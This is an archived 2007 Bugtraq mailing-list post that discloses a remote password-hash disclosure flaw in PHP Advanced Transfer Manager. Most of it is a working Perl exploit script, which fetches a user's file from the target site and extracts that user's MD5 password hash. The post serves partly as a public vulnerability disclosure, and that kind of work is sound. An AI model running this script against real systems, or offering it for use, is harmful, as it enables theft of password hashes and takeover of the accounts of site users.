| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 16 Jan 2007 03:53:54 -0500 (EST)
From: nightmare@...ackerline.ir
To: bugtraq@...urityfocus.com
Subject: PHPATM Remote Password Disclosure Vulnerablity
Hi
Application : php advanced transfer manager
Vulnerability Kind : Remote Password Hash Discloure
Product Link : phpatm.free.fr
version : All Versions Affected
mail: only_satsat@...oo.com
Author : Black-0ut
exploit :
#/usr/bin/perl
######################################################
# #
# K@V@NIR@N Security Team #
# Coded & Discovered by Red_Dragon #
# #
######################################################
use LWP::Simple;
$ha=$ARGV[0];
$pa=$ARGV[1];
$ur=$ARGV[2];
if (!$ARGV[1]) {
print"\n";
print "[+] Coded By Red_Dragon or H3CT0R3 [+]\n";
print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n";
print "[+] http://onhackerline.ir/ [+] \n";
print "[+] Black 0ut Frenzy Team [+] \n";
print"\n";
print "ex : www.ex.com /path/ <USER>\n";
exit;
}
$vul="users/".$ur;
$start = get("http://".$ha.$pa.$vul) || die "[-] Unable to retrieve: $!";
print "\n";
print "[+] Connected to : $ha";
$start=~m/([a-f0-9]{32})/;
print "\n";
print "[+] Username : $ur\n";
print "[+] MD5 Hash : $1\n";
TNX
Powered by blists - more mailing lists